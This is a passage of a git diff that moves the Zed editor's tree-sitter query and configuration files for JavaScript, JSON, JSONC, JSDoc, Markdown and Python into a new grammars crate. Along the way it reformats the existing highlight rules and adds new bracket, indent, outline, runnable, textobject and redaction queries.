[(property_identifier) (private_property_identifier)] @function.method) - right: [(function_expression) (arrow_function)]) + property: [ + (property_identifier) + (private_property_identifier) + ] @function.method) + right: [ + (function_expression) + (arrow_function) + ]) (variable_declarator name: (identifier) @function - value: [(function_expression) (arrow_function)]) + value: [ + (function_expression) + (arrow_function) + ]) (assignment_expression left: (identifier) @function - right: [(function_expression) (arrow_function)]) + right: [ + (function_expression) + (arrow_function) + ]) ; Parameters - (required_parameter (identifier) @variable.parameter) @@ -121,6 +120,7 @@ ; Special identifiers ; (type_identifier) @type + (predefined_type) @type.builtin (class_declaration @@ -133,12 +133,12 @@ (identifier) (shorthand_property_identifier) (shorthand_property_identifier_pattern) - ] @constant - (#match? @constant "^_*[A-Z_][A-Z\\d_]*$")) +] @constant + (#match? @constant "^_*[A-Z_][A-Z\\d_]*$")) ; Literals - (this) @variable.special + (super) @variable.special [ @@ -163,11 +163,12 @@ (escape_sequence) @string.escape (regex) @string.regex + (regex_flags) @keyword.operator.regex + (number) @number ; Tokens - [ ";" "?." @@ -224,7 +225,8 @@ "..." ] @operator -(regex "/" @string.regex) +(regex + "/" @string.regex) [ "(" @@ -233,20 +235,18 @@ "]" "{" "}" -] @punctuation.bracket +] @punctuation.bracket (ternary_expression [ "?" ":" - ] @operator -) + ] @operator) [ "abstract" "as" "async" - "await" "debugger" "declare" "default" @@ -293,6 +293,7 @@ ] @keyword.import [ + "await" "break" "case" "catch" @@ -310,7 +311,8 @@ "yield" ] @keyword.control -(switch_default "default" @keyword.control) +(switch_default + "default" @keyword.control) (template_substitution "${" @punctuation.special @@ -320,44 +322,70 @@ "<" @punctuation.bracket ">" @punctuation.bracket) -(decorator "@" @punctuation.special) +(decorator + "@" @punctuation.special) ; JSX elements (jsx_opening_element [ - (identifier) @type + (identifier) @type @tag.component.jsx (member_expression - object: (identifier) @type - property: (property_identifier) @type - ) - ] -) + object: (identifier) @type @tag.component.jsx + property: (property_identifier) @type @tag.component.jsx) + ]) + (jsx_closing_element [ - (identifier) @type + (identifier) @type @tag.component.jsx (member_expression - object: (identifier) @type - property: (property_identifier) @type - ) - ] -) + object: (identifier) @type @tag.component.jsx + property: (property_identifier) @type @tag.component.jsx) + ]) + (jsx_self_closing_element [ - (identifier) @type + (identifier) @type @tag.component.jsx (member_expression - object: (identifier) @type - property: (property_identifier) @type - ) - ] -) - -(jsx_opening_element (identifier) @tag.jsx (#match? @tag.jsx "^[a-z][^.]*$")) -(jsx_closing_element (identifier) @tag.jsx (#match? @tag.jsx "^[a-z][^.]*$")) -(jsx_self_closing_element (identifier) @tag.jsx (#match? @tag.jsx "^[a-z][^.]*$")) -(jsx_attribute (property_identifier) @attribute.jsx) -(jsx_opening_element (["<" ">"]) @punctuation.bracket.jsx) -(jsx_closing_element ([""]) @punctuation.bracket.jsx) -(jsx_self_closing_element (["<" "/>"]) @punctuation.bracket.jsx) -(jsx_attribute "=" @punctuation.delimiter.jsx) + object: (identifier) @type @tag.component.jsx + property: (property_identifier) @type @tag.component.jsx) + ]) + +(jsx_opening_element + (identifier) @tag.jsx + (#match? @tag.jsx "^[a-z][^.]*$")) + +(jsx_closing_element + (identifier) @tag.jsx + (#match? @tag.jsx "^[a-z][^.]*$")) + +(jsx_self_closing_element + (identifier) @tag.jsx + (#match? @tag.jsx "^[a-z][^.]*$")) + +(jsx_attribute + (property_identifier) @attribute.jsx) + +(jsx_opening_element + ([ + "<" + ">" + ]) @punctuation.bracket.jsx) + +(jsx_closing_element + ([ + "" + ]) @punctuation.bracket.jsx) + +(jsx_self_closing_element + ([ + "<" + "/>" + ]) @punctuation.bracket.jsx) + +(jsx_attribute + "=" @punctuation.delimiter.jsx) + (jsx_text) @text.jsx + (html_character_reference) @string.special diff --git a/crates/grammars/src/javascript/indents.scm b/crates/grammars/src/javascript/indents.scm new file mode 100644 index 0000000000000000000000000000000000000000..1e72160bca2f5fd04ce6d3bc7b02e9ab029eb018 --- /dev/null +++ b/crates/grammars/src/javascript/indents.scm @@ -0,0 +1,33 @@ +[ + (call_expression) + (assignment_expression) + (member_expression) + (lexical_declaration) + (variable_declaration) + (assignment_expression) + (if_statement) + (for_statement) +] @indent + +(_ + "[" + "]" @end) @indent + +(_ + "<" + ">" @end) @indent + +(_ + "{" + "}" @end) @indent + +(_ + "(" + ")" @end) @indent + +(jsx_opening_element + ">" @end) @indent + +(jsx_element + (jsx_opening_element) @start + (jsx_closing_element)? @end) @indent diff --git a/crates/grammars/src/javascript/injections.scm b/crates/grammars/src/javascript/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..8ccfc5028dea453013134c52db885d51ab2f673b --- /dev/null +++ b/crates/grammars/src/javascript/injections.scm @@ -0,0 +1,144 @@ +((comment) @injection.content + (#set! injection.language "comment")) + +(((comment) @_jsdoc_comment + (#match? @_jsdoc_comment "(?s)^/[*][*][^*].*[*]/$")) @injection.content + (#set! injection.language "jsdoc")) + +((regex) @injection.content + (#set! injection.language "regex")) + +(call_expression + function: (identifier) @_name + (#eq? @_name "css") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "css"))) + +(call_expression + function: (member_expression + object: (identifier) @_obj + (#eq? @_obj "styled") + property: (property_identifier)) + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "css"))) + +(call_expression + function: (call_expression + function: (identifier) @_name + (#eq? @_name "styled")) + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "css"))) + +(call_expression + function: (identifier) @_name + (#eq? @_name "html") + arguments: (template_string) @injection.content + (#set! injection.language "html")) + +(call_expression + function: (identifier) @_name + (#eq? @_name "js") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "javascript"))) + +(call_expression + function: (identifier) @_name + (#eq? @_name "json") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "json"))) + +(call_expression + function: (identifier) @_name + (#eq? @_name "sql") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "sql"))) + +(call_expression + function: (identifier) @_name + (#eq? @_name "ts") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "typescript"))) + +(call_expression + function: (identifier) @_name + (#match? @_name "^ya?ml$") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "yaml"))) + +(call_expression + function: (identifier) @_name + (#match? @_name "^g(raph)?ql$") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "graphql"))) + +(call_expression + function: (identifier) @_name + (#match? @_name "^g(raph)?ql$") + arguments: (arguments + (template_string + (string_fragment) @injection.content + (#set! injection.language "graphql")))) + +(call_expression + function: (identifier) @_name + (#match? @_name "^iso$") + arguments: (arguments + (template_string + (string_fragment) @injection.content + (#set! injection.language "isograph")))) + +; Parse the contents of strings and tagged template +; literals with leading ECMAScript comments: +; '/* html */' or '/*html*/' +(((comment) @_ecma_comment + [ + (string + (string_fragment) @injection.content) + (template_string + (string_fragment) @injection.content) + ]) + (#match? @_ecma_comment "^\\/\\*\\s*html\\s*\\*\\/") + (#set! injection.language "html")) + +; '/* sql */' or '/*sql*/' +(((comment) @_ecma_comment + [ + (string + (string_fragment) @injection.content) + (template_string + (string_fragment) @injection.content) + ]) + (#match? @_ecma_comment "^\\/\\*\\s*sql\\s*\\*\\/") + (#set! injection.language "sql")) + +; '/* gql */' or '/*gql*/' +; '/* graphql */' or '/*graphql*/' +(((comment) @_ecma_comment + [ + (string + (string_fragment) @injection.content) + (template_string + (string_fragment) @injection.content) + ]) + (#match? @_ecma_comment "^\\/\\*\\s*(gql|graphql)\\s*\\*\\/") + (#set! injection.language "graphql")) + +; '/* css */' or '/*css*/' +(((comment) @_ecma_comment + [ + (string + (string_fragment) @injection.content) + (template_string + (string_fragment) @injection.content) + ]) + (#match? @_ecma_comment "^\\/\\*\\s*(css)\\s*\\*\\/") + (#set! injection.language "css")) diff --git a/crates/grammars/src/javascript/outline.scm b/crates/grammars/src/javascript/outline.scm new file mode 100644 index 0000000000000000000000000000000000000000..7b8e4b2d46c9b88e6b719ceea5bb64eeb19af518 --- /dev/null +++ b/crates/grammars/src/javascript/outline.scm @@ -0,0 +1,269 @@ +(internal_module + "namespace" @context + name: (_) @name) @item + +(enum_declaration + "enum" @context + name: (_) @name) @item + +(function_declaration + "async"? @context + "function" @context + name: (_) @name + parameters: (formal_parameters + "(" @context + ")" @context)) @item + +(generator_function_declaration + "async"? @context + "function" @context + "*" @context + name: (_) @name + parameters: (formal_parameters + "(" @context + ")" @context)) @item + +(interface_declaration + "interface" @context + name: (_) @name) @item + +(program + (export_statement + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (identifier) @name) @item))) + +; Exported array destructuring +(program + (export_statement + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (array_pattern + [ + (identifier) @name @item + (assignment_pattern + left: (identifier) @name @item) + (rest_pattern + (identifier) @name @item) + ]))))) + +; Exported object destructuring +(program + (export_statement + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (object_pattern + [ + (shorthand_property_identifier_pattern) @name @item + (pair_pattern + value: (identifier) @name @item) + (pair_pattern + value: (assignment_pattern + left: (identifier) @name @item)) + (rest_pattern + (identifier) @name @item) + ]))))) + +(program + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (identifier) @name) @item)) + +; Top-level array destructuring +(program + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (array_pattern + [ + (identifier) @name @item + (assignment_pattern + left: (identifier) @name @item) + (rest_pattern + (identifier) @name @item) + ])))) + +; Top-level object destructuring +(program + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (object_pattern + [ + (shorthand_property_identifier_pattern) @name @item + (pair_pattern + value: (identifier) @name @item) + (pair_pattern + value: (assignment_pattern + left: (identifier) @name @item)) + (rest_pattern + (identifier) @name @item) + ])))) + +(class_declaration + "class" @context + name: (_) @name) @item + +; Method definitions in classes (not in object literals) +(class_body + (method_definition + [ + "get" + "set" + "async" + "*" + "readonly" + "static" + (override_modifier) + (accessibility_modifier) + ]* @context + name: (_) @name + parameters: (formal_parameters + "(" @context + ")" @context)) @item) + +; Object literal methods +(variable_declarator + value: (object + (method_definition + [ + "get" + "set" + "async" + "*" + ]* @context + name: (_) @name + parameters: (formal_parameters + "(" @context + ")" @context)) @item)) + +(public_field_definition + [ + "declare" + "readonly" + "abstract" + "static" + (accessibility_modifier) + ]* @context + name: (_) @name) @item + +; Add support for (node:test, bun:test and Jest) runnable +((call_expression + function: [ + (identifier) @_name + (member_expression + object: [ + (identifier) @_name + (member_expression + object: (identifier) @_name) + ]) + ] @context + (#any-of? @_name "it" "test" "describe" "context" "suite") + arguments: (arguments + . + [ + (string + (string_fragment) @name) + (identifier) @name + ]))) @item + +; Add support for parameterized tests +((call_expression + function: (call_expression + function: (member_expression + object: [ + (identifier) @_name + (member_expression + object: (identifier) @_name) + ] + property: (property_identifier) @_property) + (#any-of? @_name "it" "test" "describe" "context" "suite") + (#eq? @_property "each")) + arguments: (arguments + . + [ + (string + (string_fragment) @name) + (identifier) @name + ]))) @item + +; Object properties +(pair + key: [ + (property_identifier) @name + (string + (string_fragment) @name) + (number) @name + (computed_property_name) @name + ]) @item + +; Nested variables in function bodies +(statement_block + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (identifier) @name) @item)) + +; Nested array destructuring in functions +(statement_block + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (array_pattern + [ + (identifier) @name @item + (assignment_pattern + left: (identifier) @name @item) + (rest_pattern + (identifier) @name @item) + ])))) + +; Nested object destructuring in functions +(statement_block + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (object_pattern + [ + (shorthand_property_identifier_pattern) @name @item + (pair_pattern + value: (identifier) @name @item) + (pair_pattern + value: (assignment_pattern + left: (identifier) @name @item)) + (rest_pattern + (identifier) @name @item) + ])))) + +(comment) @annotation diff --git a/crates/languages/src/javascript/overrides.scm b/crates/grammars/src/javascript/overrides.scm similarity index 79% rename from crates/languages/src/javascript/overrides.scm rename to crates/grammars/src/javascript/overrides.scm index 6dbbc88ef924c2cac65aaf9ff7e7dba87b99a359..4707e2a89fdd246de8d0152d6284e188caaf539e 100644 --- a/crates/languages/src/javascript/overrides.scm +++ b/crates/grammars/src/javascript/overrides.scm @@ -2,7 +2,8 @@ (string) @string -(template_string (string_fragment) @string) +(template_string + (string_fragment) @string) (jsx_element) @element diff --git a/crates/grammars/src/javascript/runnables.scm b/crates/grammars/src/javascript/runnables.scm new file mode 100644 index 0000000000000000000000000000000000000000..b410fb4d8cadd879f657f20a4685cf3bf834ad86 --- /dev/null +++ b/crates/grammars/src/javascript/runnables.scm @@ -0,0 +1,42 @@ +; Add support for (node:test, bun:test and Jest) runnable +; Function expression that has `it`, `test` or `describe` as the function name +((call_expression + function: [ + (identifier) @_name + (member_expression + object: [ + (identifier) @_name + (member_expression + object: (identifier) @_name) + ]) + ] + (#any-of? @_name "it" "test" "describe" "context" "suite") + arguments: (arguments + . + [ + (string + (string_fragment) @run) + (identifier) @run + ])) @_js-test + (#set! tag js-test)) + +; Add support for parameterized tests +((call_expression + function: (call_expression + function: (member_expression + object: [ + (identifier) @_name + (member_expression + object: (identifier) @_name) + ] + property: (property_identifier) @_property) + (#any-of? @_name "it" "test" "describe" "context" "suite") + (#eq? @_property "each")) + arguments: (arguments + . + [ + (string + (string_fragment) @run) + (identifier) @run + ])) @_js-test + (#set! tag js-test)) diff --git a/crates/grammars/src/javascript/textobjects.scm b/crates/grammars/src/javascript/textobjects.scm new file mode 100644 index 0000000000000000000000000000000000000000..f1cc9c9491e20320d193de5dec2a9c438cee5dcc --- /dev/null +++ b/crates/grammars/src/javascript/textobjects.scm @@ -0,0 +1,91 @@ +(comment)+ @comment.around + +(function_declaration + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(method_definition + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(function_expression + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +((arrow_function + body: (statement_block + "{" + (_)* @function.inside + "}")) @function.around + (#not-has-parent? @function.around variable_declarator)) + +; Arrow function in variable declaration - capture the full declaration +([ + (lexical_declaration + (variable_declarator + value: (arrow_function + body: (statement_block + "{" + (_)* @function.inside + "}")))) + (variable_declaration + (variable_declarator + value: (arrow_function + body: (statement_block + "{" + (_)* @function.inside + "}")))) +]) @function.around + +; Arrow function in variable declaration (captures body for expression-bodied arrows) +([ + (lexical_declaration + (variable_declarator + value: (arrow_function + body: (_) @function.inside))) + (variable_declaration + (variable_declarator + value: (arrow_function + body: (_) @function.inside))) +]) @function.around + +; Catch-all for arrow functions in other contexts (callbacks, etc.) +((arrow_function + body: (_) @function.inside) @function.around + (#not-has-parent? @function.around variable_declarator)) + +(generator_function + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(generator_function_declaration + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(class_declaration + body: (_ + "{" + [ + (_) + ";"? + ]* @class.inside + "}")) @class.around + +(class + body: (_ + "{" + [ + (_) + ";"? + ]* @class.inside + "}")) @class.around diff --git a/crates/grammars/src/jsdoc/brackets.scm b/crates/grammars/src/jsdoc/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..0f6ce4bf3d4c9c903d092fc669a416e83c44e82d --- /dev/null +++ b/crates/grammars/src/jsdoc/brackets.scm @@ -0,0 +1,5 @@ +("[" @open + "]" @close) + +("{" @open + "}" @close) diff --git a/crates/languages/src/jsdoc/config.toml b/crates/grammars/src/jsdoc/config.toml similarity index 100% rename from crates/languages/src/jsdoc/config.toml rename to crates/grammars/src/jsdoc/config.toml diff --git a/crates/languages/src/jsdoc/highlights.scm b/crates/grammars/src/jsdoc/highlights.scm similarity index 97% rename from crates/languages/src/jsdoc/highlights.scm rename to crates/grammars/src/jsdoc/highlights.scm index 581b5d8111fe25443de9951cfdddc8c277ad83ff..4b5657cb2d3fa6651e2e2b7eb495c095c0ae8482 100644 --- a/crates/languages/src/jsdoc/highlights.scm +++ b/crates/grammars/src/jsdoc/highlights.scm @@ -1,3 +1,5 @@ (tag_name) @keyword.jsdoc + (type) @type.jsdoc + (identifier) @variable.jsdoc diff --git a/crates/grammars/src/json/brackets.scm b/crates/grammars/src/json/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..ac2e2ad37bfc6cd2e72323914f6975c5d3cdb60e --- /dev/null +++ b/crates/grammars/src/json/brackets.scm @@ -0,0 +1,9 @@ +("[" @open + "]" @close) + +("{" @open + "}" @close) + +(("\"" @open + "\"" @close) + (#set! rainbow.exclude)) diff --git a/crates/languages/src/json/config.toml b/crates/grammars/src/json/config.toml similarity index 88% rename from crates/languages/src/json/config.toml rename to crates/grammars/src/json/config.toml index fcae481bebbdff01957c55190266af545f346327..e2999b2df58cfe2ed648c6c57f6d526dde5599de 100644 --- a/crates/languages/src/json/config.toml +++ b/crates/grammars/src/json/config.toml @@ -1,6 +1,6 @@ name = "JSON" grammar = "json" -path_suffixes = ["json", "flake.lock", "geojson", "prettierrc"] +path_suffixes = ["json", "flake.lock", "geojson", "prettierrc", "json.dist"] line_comments = ["// "] autoclose_before = ",]}" brackets = [ diff --git a/crates/languages/src/jsonc/highlights.scm b/crates/grammars/src/json/highlights.scm similarity index 99% rename from crates/languages/src/jsonc/highlights.scm rename to crates/grammars/src/json/highlights.scm index 1098320ccba78c143b43c7608b1d4e41ad5ec20d..f9b1c337358d26f08fe5b77b3a6e1a70b3f5b418 100644 --- a/crates/languages/src/jsonc/highlights.scm +++ b/crates/grammars/src/json/highlights.scm @@ -1,6 +1,7 @@ (comment) @comment (string) @string + (escape_sequence) @string.escape (pair diff --git a/crates/grammars/src/json/indents.scm b/crates/grammars/src/json/indents.scm new file mode 100644 index 0000000000000000000000000000000000000000..63b015c2fe74dda013e201d88ebbfe06107def4a --- /dev/null +++ b/crates/grammars/src/json/indents.scm @@ -0,0 +1,5 @@ +(array + "]" @end) @indent + +(object + "}" @end) @indent diff --git a/crates/grammars/src/json/outline.scm b/crates/grammars/src/json/outline.scm new file mode 100644 index 0000000000000000000000000000000000000000..c7f988077767819128b6f028fbcf196dcf5a5678 --- /dev/null +++ b/crates/grammars/src/json/outline.scm @@ -0,0 +1,3 @@ +(pair + key: (string + (string_content) @name)) @item diff --git a/crates/languages/src/json/overrides.scm b/crates/grammars/src/json/overrides.scm similarity index 100% rename from crates/languages/src/json/overrides.scm rename to crates/grammars/src/json/overrides.scm diff --git a/crates/grammars/src/json/redactions.scm b/crates/grammars/src/json/redactions.scm new file mode 100644 index 0000000000000000000000000000000000000000..c220d0c18b79e007a6de511099254c59214ace74 --- /dev/null +++ b/crates/grammars/src/json/redactions.scm @@ -0,0 +1,11 @@ +(pair + value: (number) @redact) + +(pair + value: (string) @redact) + +(array + (number) @redact) + +(array + (string) @redact) diff --git a/crates/grammars/src/json/runnables.scm b/crates/grammars/src/json/runnables.scm new file mode 100644 index 0000000000000000000000000000000000000000..a0d95d89b577bf3f5a22b3ff6cedcd7945b4881b --- /dev/null +++ b/crates/grammars/src/json/runnables.scm @@ -0,0 +1,13 @@ +; Add support `package.json` and `composer.json` script runnable +((document + (object + (pair + key: (string + (string_content) @_name + (#eq? @_name "scripts")) + value: (object + (pair + key: (string + (string_content) @run @script)))))) + (#set! tag package-script) + (#set! tag composer-script)) diff --git a/crates/languages/src/json/textobjects.scm b/crates/grammars/src/json/textobjects.scm similarity index 100% rename from crates/languages/src/json/textobjects.scm rename to crates/grammars/src/json/textobjects.scm diff --git a/crates/grammars/src/jsonc/brackets.scm b/crates/grammars/src/jsonc/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..ac2e2ad37bfc6cd2e72323914f6975c5d3cdb60e --- /dev/null +++ b/crates/grammars/src/jsonc/brackets.scm @@ -0,0 +1,9 @@ +("[" @open + "]" @close) + +("{" @open + "}" @close) + +(("\"" @open + "\"" @close) + (#set! rainbow.exclude)) diff --git a/crates/languages/src/jsonc/config.toml b/crates/grammars/src/jsonc/config.toml similarity index 85% rename from crates/languages/src/jsonc/config.toml rename to crates/grammars/src/jsonc/config.toml index 85fb9e26c446ad705d9225422ae4fae29e03b708..acc0c2e13d5b0ad2df5e45e500be36c53e7c5857 100644 --- a/crates/languages/src/jsonc/config.toml +++ b/crates/grammars/src/jsonc/config.toml @@ -1,6 +1,6 @@ name = "JSONC" grammar = "jsonc" -path_suffixes = ["jsonc", "bun.lock", "devcontainer.json", "pyrightconfig.json", "tsconfig.json", "luaurc"] +path_suffixes = ["jsonc", "bun.lock", "devcontainer.json", "pyrightconfig.json", "tsconfig.json", "luaurc", "swcrc", "babelrc", "eslintrc", "stylelintrc", "jshintrc"] line_comments = ["// "] autoclose_before = ",]}" brackets = [ diff --git a/crates/languages/src/json/highlights.scm b/crates/grammars/src/jsonc/highlights.scm similarity index 99% rename from crates/languages/src/json/highlights.scm rename to crates/grammars/src/jsonc/highlights.scm index 1098320ccba78c143b43c7608b1d4e41ad5ec20d..f9b1c337358d26f08fe5b77b3a6e1a70b3f5b418 100644 --- a/crates/languages/src/json/highlights.scm +++ b/crates/grammars/src/jsonc/highlights.scm @@ -1,6 +1,7 @@ (comment) @comment (string) @string + (escape_sequence) @string.escape (pair diff --git a/crates/grammars/src/jsonc/indents.scm b/crates/grammars/src/jsonc/indents.scm new file mode 100644 index 0000000000000000000000000000000000000000..63b015c2fe74dda013e201d88ebbfe06107def4a --- /dev/null +++ b/crates/grammars/src/jsonc/indents.scm @@ -0,0 +1,5 @@ +(array + "]" @end) @indent + +(object + "}" @end) @indent diff --git a/crates/grammars/src/jsonc/injections.scm b/crates/grammars/src/jsonc/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..2f0e58eb6431515b86b6042e5828263341513e99 --- /dev/null +++ b/crates/grammars/src/jsonc/injections.scm @@ -0,0 +1,2 @@ +((comment) @injection.content + (#set! injection.language "comment")) diff --git a/crates/grammars/src/jsonc/outline.scm b/crates/grammars/src/jsonc/outline.scm new file mode 100644 index 0000000000000000000000000000000000000000..c7f988077767819128b6f028fbcf196dcf5a5678 --- /dev/null +++ b/crates/grammars/src/jsonc/outline.scm @@ -0,0 +1,3 @@ +(pair + key: (string + (string_content) @name)) @item diff --git a/crates/languages/src/jsonc/overrides.scm b/crates/grammars/src/jsonc/overrides.scm similarity index 97% rename from crates/languages/src/jsonc/overrides.scm rename to crates/grammars/src/jsonc/overrides.scm index 81fec9a5f57b28fc67b4781ec37df43559e21dc9..544e9876f8ea8f1d676ee21731fdcb30fc7163ec 100644 --- a/crates/languages/src/jsonc/overrides.scm +++ b/crates/grammars/src/jsonc/overrides.scm @@ -1,2 +1,3 @@ (comment) @comment.inclusive + (string) @string diff --git a/crates/grammars/src/jsonc/redactions.scm b/crates/grammars/src/jsonc/redactions.scm new file mode 100644 index 0000000000000000000000000000000000000000..c220d0c18b79e007a6de511099254c59214ace74 --- /dev/null +++ b/crates/grammars/src/jsonc/redactions.scm @@ -0,0 +1,11 @@ +(pair + value: (number) @redact) + +(pair + value: (string) @redact) + +(array + (number) @redact) + +(array + (string) @redact) diff --git a/crates/languages/src/jsonc/textobjects.scm b/crates/grammars/src/jsonc/textobjects.scm similarity index 100% rename from crates/languages/src/jsonc/textobjects.scm rename to crates/grammars/src/jsonc/textobjects.scm diff --git a/crates/languages/src/markdown-inline/config.toml b/crates/grammars/src/markdown-inline/config.toml similarity index 100% rename from crates/languages/src/markdown-inline/config.toml rename to crates/grammars/src/markdown-inline/config.toml diff --git a/crates/languages/src/markdown-inline/highlights.scm b/crates/grammars/src/markdown-inline/highlights.scm similarity index 77% rename from crates/languages/src/markdown-inline/highlights.scm rename to crates/grammars/src/markdown-inline/highlights.scm index 3c9f6fbcc340bd085466055c7b35551dd71b8c53..26c066ea0a0f6cc93073f6d525d44f2a6456fd49 100644 --- a/crates/languages/src/markdown-inline/highlights.scm +++ b/crates/grammars/src/markdown-inline/highlights.scm @@ -1,6 +1,9 @@ (emphasis) @emphasis.markup + (strong_emphasis) @emphasis.strong.markup + (code_span) @text.literal.markup + (strikethrough) @strikethrough.markup [ @@ -13,8 +16,18 @@ (link_label) ] @link_text.markup -(inline_link ["(" ")"] @link_uri.markup) -(image ["(" ")"] @link_uri.markup) +(inline_link + [ + "(" + ")" + ] @link_uri.markup) + +(image + [ + "(" + ")" + ] @link_uri.markup) + [ (link_destination) (uri_autolink) diff --git a/crates/languages/src/markdown-inline/injections.scm b/crates/grammars/src/markdown-inline/injections.scm similarity index 100% rename from crates/languages/src/markdown-inline/injections.scm rename to crates/grammars/src/markdown-inline/injections.scm diff --git a/crates/grammars/src/markdown/brackets.scm b/crates/grammars/src/markdown/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..5aaf93f63da3502c41b43027ee615592521c94ae --- /dev/null +++ b/crates/grammars/src/markdown/brackets.scm @@ -0,0 +1,24 @@ +("(" @open + ")" @close) + +("[" @open + "]" @close) + +("{" @open + "}" @close) + +(("\"" @open + "\"" @close) + (#set! rainbow.exclude)) + +(("`" @open + "`" @close) + (#set! rainbow.exclude)) + +(("'" @open + "'" @close) + (#set! rainbow.exclude)) + +(((fenced_code_block_delimiter) @open + (fenced_code_block_delimiter) @close) + (#set! rainbow.exclude)) diff --git a/crates/languages/src/markdown/config.toml b/crates/grammars/src/markdown/config.toml similarity index 98% rename from crates/languages/src/markdown/config.toml rename to crates/grammars/src/markdown/config.toml index 5e7acd230b6f191aebff609bbc1087fbff8d3909..27dd1821e414fb8e068c3c1975ec6189d80c0350 100644 --- a/crates/languages/src/markdown/config.toml +++ b/crates/grammars/src/markdown/config.toml @@ -1,6 +1,7 @@ name = "Markdown" grammar = "markdown" path_suffixes = ["md", "mdx", "mdwn", "mdc", "markdown", "MD"] +modeline_aliases = ["md"] completion_query_characters = ["-"] block_comment = { start = "", tab_size = 0 } autoclose_before = ";:.,=}])>" diff --git a/crates/languages/src/markdown/highlights.scm b/crates/grammars/src/markdown/highlights.scm similarity index 58% rename from crates/languages/src/markdown/highlights.scm rename to crates/grammars/src/markdown/highlights.scm index 707bcc0816366f5cc875c9f1197b42a2363cab99..76254c2472d98dc58a6efdccef41d9ec677a1b77 100644 --- a/crates/languages/src/markdown/highlights.scm +++ b/crates/grammars/src/markdown/highlights.scm @@ -9,7 +9,9 @@ (setext_heading) (thematic_break) ] @title.markup -(setext_heading (paragraph) @title.markup) + +(setext_heading + (paragraph) @title.markup) [ (list_marker_plus) @@ -19,11 +21,22 @@ (list_marker_parenthesis) ] @punctuation.list_marker.markup -(block_quote_marker) @punctuation.markup -(pipe_table_header "|" @punctuation.markup) -(pipe_table_row "|" @punctuation.markup) -(pipe_table_delimiter_row "|" @punctuation.markup) -(pipe_table_delimiter_cell "-" @punctuation.markup) +[ + (block_quote_marker) + (block_continuation) +] @punctuation.markup + +(pipe_table_header + "|" @punctuation.markup) + +(pipe_table_row + "|" @punctuation.markup) + +(pipe_table_delimiter_row + "|" @punctuation.markup) + +(pipe_table_delimiter_cell + "-" @punctuation.markup) [ (fenced_code_block_delimiter) @@ -31,4 +44,5 @@ ] @punctuation.embedded.markup (link_reference_definition) @link_text.markup + (link_destination) @link_uri.markup diff --git a/crates/languages/src/markdown/indents.scm b/crates/grammars/src/markdown/indents.scm similarity index 50% rename from crates/languages/src/markdown/indents.scm rename to crates/grammars/src/markdown/indents.scm index dc6dfa6118309c264e146a5af167327947fc6946..742100e3238b6dc7d456307762b2089bb780ac33 100644 --- a/crates/languages/src/markdown/indents.scm +++ b/crates/grammars/src/markdown/indents.scm @@ -1,3 +1,4 @@ -(list (list_item) @indent) +(list + (list_item) @indent) (list_item) @start.list_item diff --git a/crates/languages/src/markdown/injections.scm b/crates/grammars/src/markdown/injections.scm similarity index 52% rename from crates/languages/src/markdown/injections.scm rename to crates/grammars/src/markdown/injections.scm index f2b959dfdae9d5b0c11146c2f2e5509005a2fe5e..46717b28a97a2019f3bcd6b01815debccb3c3e30 100644 --- a/crates/languages/src/markdown/injections.scm +++ b/crates/grammars/src/markdown/injections.scm @@ -4,11 +4,13 @@ (code_fence_content) @injection.content) ((inline) @injection.content - (#set! injection.language "markdown-inline")) + (#set! injection.language "markdown-inline")) ((html_block) @injection.content (#set! injection.language "html")) -((minus_metadata) @injection.content (#set! injection.language "yaml")) +((minus_metadata) @injection.content + (#set! injection.language "yaml")) -((plus_metadata) @injection.content (#set! injection.language "toml")) +((plus_metadata) @injection.content + (#set! injection.language "toml")) diff --git a/crates/grammars/src/markdown/outline.scm b/crates/grammars/src/markdown/outline.scm new file mode 100644 index 0000000000000000000000000000000000000000..a4d8c586dd991f4ada1b7cffa1b2319eb79a7973 --- /dev/null +++ b/crates/grammars/src/markdown/outline.scm @@ -0,0 +1,6 @@ +(section + (atx_heading + . + (_) @context + . + (_) @name)) @item diff --git a/crates/grammars/src/markdown/textobjects.scm b/crates/grammars/src/markdown/textobjects.scm new file mode 100644 index 0000000000000000000000000000000000000000..c84914b2409dd53c27e22c33d8ca9771b699f48d --- /dev/null +++ b/crates/grammars/src/markdown/textobjects.scm @@ -0,0 +1,3 @@ +(section + (atx_heading) + (_)* @class.inside) @class.around diff --git a/crates/grammars/src/python/brackets.scm b/crates/grammars/src/python/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..5abcf6bdd43624f625e3c08444701fa67311c00f --- /dev/null +++ b/crates/grammars/src/python/brackets.scm @@ -0,0 +1,12 @@ +("(" @open + ")" @close) + +("[" @open + "]" @close) + +("{" @open + "}" @close) + +(((string_start) @open + (string_end) @close) + (#set! rainbow.exclude)) diff --git a/crates/languages/src/python/config.toml b/crates/grammars/src/python/config.toml similarity index 98% rename from crates/languages/src/python/config.toml rename to 